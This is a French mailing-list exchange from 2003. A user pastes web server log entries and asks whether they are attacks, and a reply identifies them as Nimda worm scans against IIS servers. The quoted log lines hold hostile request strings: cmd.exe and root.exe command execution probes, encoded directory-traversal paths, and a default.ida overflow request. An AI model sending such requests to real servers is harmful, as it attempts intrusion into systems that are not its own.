Loïc Le Guyader wrote:
Salut à tous,
J'ai installer hier un server web avec une seule page pour vérifier
très simplement si ma machine est connectée.
Ce matin je regarde les logs de ce server, et surprise, j'ai plein de
requêtes mais pas pour voir index.html:
xxx.xxx.xxx.xxx - - [14/Jan/2003:14:05:54 +0100] "GET /scripts/root.exe?/c+dir
HTTP/
1.0" 404 0 "" ""
xxx.xxx.xxx.xxx - - [14/Jan/2003:14:05:56 +0100] "GET
/scripts/..%255c../winnt/syste
m32/cmd.exe?/c+dir HTTP/1.0" 404 0 "" ""
xxx.xxx.xxx.xxx - - [14/Jan/2003:14:05:58 +0100] "GET
/msadc/..%255c../..%255c../..%
255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 40
4 0 "" ""
xxx.xxx.xxx.xxx - - [14/Jan/2003:20:33:12 +0100] "GET
/default.ida?NNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNN HTTP/1.0" 404 0 "" ""
[...]
C'est bien des attaques ça? Et si oui, c'est dégueulasse de faire un
abuse?
Pas de problème avec Apache, se sont des attaques du vers Nimda vers les
serveurs IIS.
Il reste pas mal de machines Windows infectées. Le vers scan le réseau
pour trouver une cible (serveur IIS) à infecter.
--
==============================================
| FREDERIC MASSOT |
| http://www.juliana-multimedia.com |
| mailto:[EMAIL PROTECTED] |
===========================Debian=GNU/Linux===
